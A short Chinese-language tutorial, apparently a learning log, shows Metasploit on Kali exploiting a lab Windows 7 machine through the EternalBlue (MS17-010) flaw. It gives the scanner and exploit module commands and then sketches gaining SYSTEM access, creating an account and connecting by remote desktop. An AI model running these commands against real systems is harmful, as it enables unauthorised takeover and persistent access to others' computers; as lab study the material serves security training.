1、开启postgresql数据库

使用kali中的Metasploit通过windows7的永恒之蓝漏洞攻击并控制win7系统(9.27 第十三天)-LMLPHP

2、msfconsole 进入MSF中

3、search 17-010 搜索cve17-010相关的exp

auxiliary/scanner/smb/smb_ms17_010    扫描漏洞是否存在

exploit/windows/smb/ms17_010_eternalblue  用来攻击的exp

使用kali中的Metasploit通过windows7的永恒之蓝漏洞攻击并控制win7系统(9.27 第十三天)-LMLPHP

4、探测漏洞是否存在

use auxiliary/scanner/smb/smb_ms17_010

使用kali中的Metasploit通过windows7的永恒之蓝漏洞攻击并控制win7系统(9.27 第十三天)-LMLPHP

5、set rhosts 192.168.121.146   指定需要设置的主机

exploit    设置完成之后运行

使用kali中的Metasploit通过windows7的永恒之蓝漏洞攻击并控制win7系统(9.27 第十三天)-LMLPHP

6、实施攻击

use exploit/windows/smb/ms17_010_eternalblue   进去攻击模块

set rhosts 192.168.121.146   指定攻击ip

exploit    运行

使用kali中的Metasploit通过windows7的永恒之蓝漏洞攻击并控制win7系统(9.27 第十三天)-LMLPHP

使用kali中的Metasploit通过windows7的永恒之蓝漏洞攻击并控制win7系统(9.27 第十三天)-LMLPHP

7、到这里我们就攻击成功了,直接得到目标的system权限

8、然后创建账户--打开3380端口--rdesktop 靶机的IP  使用远程桌面连接靶机--连接完成

05-26 13:30